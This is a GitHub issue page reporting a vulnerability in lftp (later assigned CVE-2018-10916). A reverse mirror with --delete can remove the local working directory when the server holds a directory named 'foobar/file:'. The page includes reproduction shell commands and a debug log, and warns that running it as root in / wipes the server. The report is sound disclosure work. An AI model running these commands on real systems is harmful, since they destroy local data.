Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Exploit in reverse mirror job deletes cwd on source #452

tomsommer opened this Issue May 16, 2018 · 1 comment


None yet
2 participants
Copy link

tomsommer commented May 16, 2018

Warning: This will delete local content on the server you are running the commands from

  1. Create a directory called foobar/file: on any FTP server
  2. Run an lftp reverse mirror command with --delete towards this server, where foobar/file: does not exist on the local source.
  3. Watch as lftp deletes the cwd on the sourceserver. If you run the lftp command in / as root, that means the entire server will be wiped.

Script to reproduce:

mkdir -p /var/tmp/ilovethisdir/
touch ilovethisfile
cd /var/tmp/ilovethisdir/
mkdir -p /var/tmp/lftptest/foobar/
/usr/local/bin/lftp -d -c 'debug 10; set ftp:ssl-allow 0; open -u,"somepassword"; mkdir -p foobar/file:/ls_/'
/usr/local/bin/lftp -d -c 'debug 10; set ftp:ssl-allow 0; open -u,"somepassword"; mirror --verbose=3 --delete --reverse /var/tmp/lftptest /;'
ls -l /var/tmp/ilovethisdir/

From log:

Removing old directory `foobar/file:'
---- local cwd is `/var/tmp/ilovethisdir'
---- remove(/var/tmp/ilovethisdir/.)
**** .: Invalid argument
rm: Access failed: .: Invalid argument

LFTP 4.8.3
Libraries used: Expat 2.0.1, GnuTLS 2.12.23, idn2 2.0.4, Readline 6.0, zlib 1.2.3

@lavv17 lavv17 closed this in a27e07d Jul 31, 2018


This comment has been minimized.

Copy link

carnil commented Aug 1, 2018

This issue was assigned CVE-2018-10916.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.